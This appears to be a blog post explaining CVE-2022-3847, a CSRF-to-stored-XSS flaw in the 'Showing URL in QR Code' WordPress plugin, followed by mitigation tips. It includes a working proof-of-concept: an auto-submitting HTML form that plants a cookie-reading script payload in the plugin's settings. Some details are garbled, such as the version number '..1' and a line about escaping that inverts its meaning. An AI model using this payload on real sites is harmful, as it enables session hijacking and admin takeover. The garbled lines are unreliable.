CVE-2022-3847 - Exploiting the Showing URL in QR Code WordPress Plugin’s Unchecked Settings for Stored XSS
WordPress plugins make website management easier, but sometimes they come with risky vulnerabilities. One such issue is CVE-2022-3847, which impacts the Showing URL in QR Code plugin for WordPress, version ..1 and below. This flaw lets attackers inject dangerous scripts due to missing CSRF checks, poor input validation, and lack of data output escaping.
In this post, let’s break down – in plain English – how this vulnerability works, see real-world exploit code, and understand how you can protect your sites.
What’s CVE-2022-3847?
- Plugin Affected: Showing URL in QR Code
Version: ..1 and below
- CVE Detail: CVE-2022-3847 @ Mitre
Escape outputs – so that code actually gets executed when viewed.
Because of this, an attacker could make an admin (or editor) save malicious JavaScript in the plugin’s settings, leading to *Stored XSS*.
How the Attack Works
1. Attacker crafts a malicious webpage that submits a POST request to the plugin’s settings page with a JavaScript payload in one of the fields (like the QR code title or description).
2. Victim (admin/editor) is tricked into visiting attacker’s page while logged in to WordPress.
Later, the site loads the malicious JavaScript, causing the stored XSS.
The attack doesn’t need the admin to do anything but visit a page or click a link – so long as they aren’t logged out.
Below is a simple example of what an attacker’s HTML form could look like
<!-- Attacker's evil page -->
<html>
<body>
<form id="csrf_form" action="https://victimsite.com/wp-admin/options-general.php?page=showing-url-qr-code"; method="POST">
<input type="hidden" name="qr_title" value='<img src="x" onerror="alert(document.cookie)">' />
<input type="hidden" name="other_setting" value="any" />
<!-- Add other plugin fields if needed -->
</form>
<script>
// Auto-submit the form when the page loads
document.getElementById('csrf_form').submit();
</script>
</body>
</html>
When a WordPress admin (logged in) visits this attacker-controlled webpage, it sends their browser unseen POST data to the plugin’s settings handler, injecting the malicious payload.
Where Does the XSS Run?
If the plugin displays the qr_title (as in our example) back on any admin or site page without escaping, then whoever loads that page runs the JavaScript. Attackers can steal cookies, hijack sessions, or take over admin accounts.
Typical payload: <img src="x" onerror="alert(document.cookie)">
- Real threat: The JS code can be anything. In real attacks, it could load remote scripts or redirect admins to another page.
No escaping: The data is outputted raw into HTML, so browsers execute it as code.
This is a combo that lets attackers *store* persistent malicious code on your site.
Is There a Patch?
As of now, the plugin remains at version ..1, with no sign of an update or fix as per WordPress.org and related WPScan entry.
Use a Web Application Firewall (WAF) to block suspicious POST requests.
- Employ a security plugin like Wordfence or Sucuri for extra protection against XSS and CSRF.
Only install trusted plugins and always keep them updated.
Tip: Check all plugin settings and pages for unexpected JavaScript popups. If you spot any, clean up the settings manually via the database or plugin’s cleanup routine.
Learn More
- CVE-2022-3847 at NVD
- WPScan Advisory
- WordPress Plugin Directory: Showing URL in QR Code
Conclusion
CVE-2022-3847 is a clear example of why *every* plugin developer should enforce CSRF protection, sanitize user input, and escape output. If you run WordPress, never assume a plugin is safe just because it’s on the official repository – especially if it isn’t regularly updated.
Stay vigilant, update your software, and when in doubt, disable risky plugins!
*This post is an exclusive overview of CVE-2022-3847 – please share responsibly.*
Timeline
Published on: 11/28/2022 14:15:00 UTC
Last modified on: 12/02/2022 19:47:00 UTC